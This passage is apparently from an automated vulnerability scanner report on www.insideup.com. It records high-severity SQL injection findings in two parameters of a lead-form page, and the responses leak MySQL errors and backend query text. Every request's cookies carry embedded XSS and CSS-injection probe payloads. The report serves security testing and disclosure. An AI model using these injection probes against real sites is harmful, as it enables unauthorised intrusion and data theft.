Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b9f7d1sgpu2pjlti6pm1ppiut4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.217. http://www.insideup.com/ppc/leadflow/deco00/project.php [attributeId_390 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The attributeId_390 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_390 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months'&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rrnuqabjbtq4a1njoq7n4tdfp5; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months''&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4gjep9c9hakjvdeuem4lmkcc84; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.218. http://www.insideup.com/ppc/leadflow/deco00/project.php [attributeId_391 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The attributeId_391 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_391 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time'&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:43 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f0qmko2k5jhdvhg5i7h0cgmrm7; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s the first time'&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

